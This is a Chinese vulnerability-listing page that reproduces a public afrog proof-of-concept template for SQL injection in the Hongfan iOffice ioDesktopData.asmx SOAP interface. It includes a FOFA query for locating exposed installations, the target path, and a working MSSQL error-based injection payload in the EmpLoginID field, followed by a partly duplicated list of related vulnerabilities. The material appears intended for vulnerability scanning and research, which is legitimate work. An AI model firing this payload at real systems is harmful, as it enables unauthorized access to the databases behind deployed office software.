hongfan-iodesktopdata-sqli: 红帆iOffice ioDesktopData.asmx接口SQL注入

日期: 2025-09-01 | 影响软件: hongfan iodesktopdata | POC: 已公开

漏洞描述

fofa: (app="红帆-ioffice" || app="红帆-HFOffice")

PoC代码[已公开]

id: hongfan-iodesktopdata-sqli

info:
  name: 红帆iOffice ioDesktopData.asmx接口SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    fofa: (app="红帆-ioffice" || app="红帆-HFOffice")
  tags: hongfan,sqli
  created: 2024/03/05

set:
  randomInt: randomInt(100000, 999999)
rules:
  r0:
    request:
      method: POST
      path: /iOffice/prg/set/wss/ioDesktopData.asmx
      headers:
        Content-Type: text/xml;charset=UTF-8
      body: |
        <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
        <soap:Header/>
        <soap:Body>
        <tem:GetDepSchedule>
        <!--type: string-->
        <tem:EmpLoginID>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(select sys.fn_varbintohexstr(hashbytes('md5','{{randomInt}}')))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tem:EmpLoginID>
        </tem:GetDepSchedule>
        </soap:Body>
        </soap:Envelope>
    expression: response.status == 500 && response.body.bcontains(bytes(md5(string(randomInt))))
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/hongfan-iodesktopdata-sqli.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞 无POC

万户OA freemarkeService 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC

万户OA informationmanager_upload.jsp 任意文件上传漏洞无POC

万户OA freemarkeService 远程命令执行漏洞无POC